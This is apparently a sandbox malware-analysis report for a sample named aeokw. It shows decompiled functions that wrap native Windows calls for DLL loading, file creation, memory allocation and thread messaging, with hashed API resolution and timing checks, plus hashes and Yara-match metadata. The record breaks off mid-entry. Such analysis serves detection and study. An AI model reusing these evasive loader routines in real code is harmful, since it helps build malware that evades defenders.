                        • API String ID: 2738559852-4222312340
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 249 40ace0-40ad09 call 41cc10 252 40ad0b-40ad0e 249->252 253 40ad0f-40ad1d call 41d030 249->253 256 40ad2d-40ad3e call 41b460 253->256 257 40ad1f-40ad2a call 41d2b0 253->257 262 40ad40-40ad54 LdrLoadDll 256->262 263 40ad57-40ad5a 256->263 257->256 262->263
                        C-Code - Quality: 100%
                        			E0040ACE0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC10( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D030(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2B0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B460(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                        0x0040acfc
                        0x0040acff
                        0x0040ad04
                        0x0040ad09
                        0x0040ad13
                        0x0040ad18
                        0x0040ad1b
                        0x0040ad1d
                        0x0040ad25
                        0x0040ad2a
                        0x0040ad2a
                        0x0040ad31
                        0x0040ad39
                        0x0040ad3c
                        0x0040ad3e
                        0x0040ad52
                        0x00000000
                        0x0040ad54
                        0x0040ad5a
                        0x0040ad0e
                        0x0040ad0e
                        0x0040ad0e

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                        • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 270 41a320-41a336 271 41a33c-41a371 NtCreateFile 270->271 272 41a337 call 41af20 270->272 272->271
                        C-Code - Quality: 100%
                        			E0041A320(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                        0x0041a32f
                        0x0041a337
                        0x0041a36d
                        0x0041a371

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A31F Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 273 41a31f-41a371 call 41af20 NtCreateFile
                        C-Code - Quality: 100%
                        			E0041A31F(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				_t18 = _a4;
				_t5 = _t18 + 0xc40; // 0xc40
				E0041AF20(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}





                        0x0041a323
                        0x0041a32f
                        0x0041a337
                        0x0041a36d
                        0x0041a371

                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: d7ba9f62a806b2787265f0847ae47cc35efeb68c0e1ba99237bc1b3d0184de37
                        • Instruction ID: ec215353cca3a6878de4362678391beda19c1c878c6b2facfe8b3faf2a10b490
                        • Opcode Fuzzy Hash: d7ba9f62a806b2787265f0847ae47cc35efeb68c0e1ba99237bc1b3d0184de37
                        • Instruction Fuzzy Hash: CFF0E2B2214149ABCB08CF99D884CEB77ADFF8C354B15864DFA1D93202D634E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A4FB Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 284 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                        C-Code - Quality: 79%
                        			E0041A4FB(void* __eax, void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				void* _t28;

				asm("insd");
				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E0041AF20(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                        0x0041a4fc
                        0x0041a503
                        0x0041a50f
                        0x0041a517
                        0x0041a539
                        0x0041a53d

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: e612f15f6f2267441e04731130d5a6bfe39a5d9b5473ed0ba4227a773dcbf824
                        • Instruction ID: e820be8047e91d5337914ac408771f2378100c9e5cea71a21508ab3de16f6a79
                        • Opcode Fuzzy Hash: e612f15f6f2267441e04731130d5a6bfe39a5d9b5473ed0ba4227a773dcbf824
                        • Instruction Fuzzy Hash: ACF0F8B2210218ABCB14DF89DC81EEB77ADAF8C754F118259BA1997281C630E911CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                        0x0041a50f
                        0x0041a517
                        0x0041a539
                        0x0041a53d

                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0041A450(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                        0x0041a453
                        0x0041a456
                        0x0041a45f
                        0x0041a467
                        0x0041a475
                        0x0041a479

                        APIs
                        • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00409AA0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BDD0( &_v284, 0x104);
						E0041C440( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                        0x00409aab
                        0x00409ab3
                        0x00409ab5
                        0x00409aba
                        0x00409abf
                        0x00409ad2
                        0x00409ad7
                        0x00409ae0
                        0x00409aec
                        0x00409aff
                        0x00409b04
                        0x00409b07
                        0x00409b10
                        0x00409b22
                        0x00409b27
                        0x00409b2c
                        0x00000000
                        0x00000000
                        0x00409b2e
                        0x00409b32
                        0x00000000
                        0x00000000
                        0x00409b34
                        0x00000000
                        0x00409b32
                        0x00409b36
                        0x00409b39
                        0x00409b3f
                        0x00409b41
                        0x00409b4c
                        0x00409b51
                        0x00409b54
                        0x00409b61
                        0x00409b6c
                        0x00409b6e
                        0x00409b74
                        0x00409b78
                        0x00409b7b
                        0x00409b7b
                        0x00409b82
                        0x00409b85
                        0x00409b8a
                        0x00409b97
                        0x00409ac6
                        0x00409ac6
                        0x00409ac6

                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                        • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                        • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                        • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 6 41a5f0-41a621 call 41af20 RtlAllocateHeap
                        C-Code - Quality: 100%
                        			E0041A5F0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF20(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                        0x0041a607
                        0x0041a612
                        0x0041a61d
                        0x0041a621

                        APIs
                        • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: &EA
                        • API String ID: 1279760036-1330915590
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 204 408308-40831f 205 408328-40835a call 41c9c0 call 40ace0 call 414e40 204->205 206 408323 call 41be20 204->206 213 40835c-40836e PostThreadMessageW 205->213 214 40838e-408392 205->214 206->205 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                        C-Code - Quality: 73%
                        			E00408308(void* __eax, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _v117;
				void* _t16;
				int _t17;
				long _t30;
				int _t35;
				void* _t38;
				void* _t40;

				_t38 = _t40;
				_v68 = 0;
				E0041BE20( &_v67, 0, 0x3f);
				E0041C9C0( &_v68, 3);
				_t16 = E0040ACE0(_a4 + 0x1c,  &_v68); // executed
				_t17 = E00414E40(_a4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
				_t35 = _t17;
				if(_t35 != 0) {
					_push(0x6519c7e4);
					_t30 = _a8;
					_t17 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					_t47 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t35(_t30, 0x8003, _t38 + (E0040A470(_t47, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}












                        0x00408311
                        0x0040831f
                        0x00408323
                        0x0040832e
                        0x0040833e
                        0x0040834e
                        0x00408353
                        0x0040835a
                        0x0040835c
                        0x0040835d
                        0x0040836a
                        0x0040836c
                        0x0040836e
                        0x0040838b
                        0x0040838b
                        0x0040838d
                        0x00408392

                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: e67b4a49b9e0c07a45658d3cee0be7f900f0b267e2f7f7c02acac5457fda6d52
                        • Instruction ID: d0f6cd01bfff6c5bced5e97e9eb8c95343b9b688216560f9dd970d4a7c454c49
                        • Opcode Fuzzy Hash: e67b4a49b9e0c07a45658d3cee0be7f900f0b267e2f7f7c02acac5457fda6d52
                        • Instruction Fuzzy Hash: 94012D71A8031877E720A6A58C43FFE6B2C5F40B54F04011EFF04FB1C1D6E9690546E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 219 408310-40831f 220 408328-40835a call 41c9c0 call 40ace0 call 414e40 219->220 221 408323 call 41be20 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                        C-Code - Quality: 82%
                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE20( &_v67, 0, 0x3f);
				E0041C9C0( &_v68, 3);
				_t12 = E0040ACE0(_a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                        0x0040831f
                        0x00408323
                        0x0040832e
                        0x0040833e
                        0x0040834e
                        0x00408353
                        0x0040835a
                        0x0040835d
                        0x0040836a
                        0x0040836c
                        0x0040836e
                        0x0040838b
                        0x0040838b
                        0x00000000
                        0x0040838d
                        0x00408392

                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                        • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                        • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                        • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004082A6 Relevance: 1.6, APIs: 1, Instructions: 51threadwindowCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 234 4082a6-4082ac 235 408328-40835a call 41c9c0 call 40ace0 call 414e40 234->235 236 4082ae-4082af 234->236 243 40835c-40836e PostThreadMessageW 235->243 244 40838e-408392 235->244 236->235 245 408370-40838a call 40a470 243->245 246 40838d 243->246 245->246 246->244
                        C-Code - Quality: 69%
                        			E004082A6(void* __ebx, intOrPtr* _a4, intOrPtr _a8, long _a12) {
				char _v64;
				void* _t9;
				int _t10;
				void* _t21;
				void* _t24;
				long _t27;
				int _t31;
				void* _t33;

				asm("sbb esi, [eax-0x4e]");
				if(__ebx + _t33 != 0) {
					E0041C9C0( &_v64, 3);
					_t9 = E0040ACE0(_a8 + 0x1c,  &_v64); // executed
					_t10 = E00414E40(_a8 + 0x1c, _t9, 0, 0, 0xc4e7b6d6);
					_t31 = _t10;
					__eflags = _t31;
					if(_t31 != 0) {
						_t27 = _a12;
						_t10 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
						__eflags = _t10;
						if(__eflags == 0) {
							_t10 =  *_t31(_t27, 0x8003, _t33 + (E0040A470(__eflags, 1, 8) & 0x000000ff) - 0x40, _t10);
						}
					}
					return _t10;
				} else {
					_push(_t33);
					_t24 = E0041B730(_t21);
					if(_t24 == 0 || _t24 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a4 + _t24;
					}
				}
			}











                        0x004082a8
                        0x004082ac
                        0x0040832e
                        0x0040833e
                        0x0040834e
                        0x00408353
                        0x00408358
                        0x0040835a
                        0x0040835d
                        0x0040836a
                        0x0040836c
                        0x0040836e
                        0x0040838b
                        0x0040838b
                        0x0040838d
                        0x00408392
                        0x004082ae
                        0x004082b0
                        0x004082b8
                        0x004082bc
                        0x004082cf
                        0x004082d2
                        0x004082c6
                        0x004082ce
                        0x004082ce
                        0x004082bc

                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 6aaabfd5a16b850eb69c1c12a248f6091afa7c6f0458af8c1e3d292dd8942bc1
                        • Instruction ID: 037cbf3ae9f420d5129a02319aedae942565b592f2a8777cea9704e2e8a68ef6
                        • Opcode Fuzzy Hash: 6aaabfd5a16b850eb69c1c12a248f6091afa7c6f0458af8c1e3d292dd8942bc1
                        • Instruction Fuzzy Hash: 4D01F972A8032876E7105A509C43FFE7318AB80F14F05012EFF04FB1C1D5B9290606E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A738 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 264 41a738-41a73d 265 41a73f-41a759 264->265 266 41a7be-41a7c4 LookupPrivilegeValueW 264->266 267 41a75f-41a780 265->267 268 41a75a call 41af20 265->268 268->267
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 542f340034508ee5ee54ed64a196dc1cd56a6af149c9b9cabecb4b50a495cbe3
                        • Instruction ID: 872b5fda29e4cbfa600bdd44972183829caad272b32237683a56f9c650899d65
                        • Opcode Fuzzy Hash: 542f340034508ee5ee54ed64a196dc1cd56a6af149c9b9cabecb4b50a495cbe3
                        • Instruction Fuzzy Hash: 03F067B6200108AFCB14DFA9DC80EEB37ADEF88354F00825AFA0C97241C630E815CBB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A6FD Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 276 41a6fd-41a6fe 277 41a700-41a734 call 41af20 276->277 278 41a682-41a69c call 41af20 ExitProcess 276->278
                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 8200540e889aab06b42adc1a2ab9cb0077acd4e90c93de7f2c20bd0016404ca2
                        • Instruction ID: a934600f091833ecacb74bbb3d7bb1206aecee0922428eb6f37b16634cef80d1
                        • Opcode Fuzzy Hash: 8200540e889aab06b42adc1a2ab9cb0077acd4e90c93de7f2c20bd0016404ca2
                        • Instruction Fuzzy Hash: 39F05EB16012046BDB10EFA9CC85EE737ADEF88714F058559FD186B202C934ED118BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0041A781 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 287 41a781-41a78c 288 41a7ad-41a7bc 287->288 289 41a78e-41a7aa call 41af20 287->289 291 41a7be-41a7c4 LookupPrivilegeValueW 288->291 289->288
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 896a0f2a9804b7cc9b542f646fc39b89f94c70de8e344e7d2b9837168f29a886
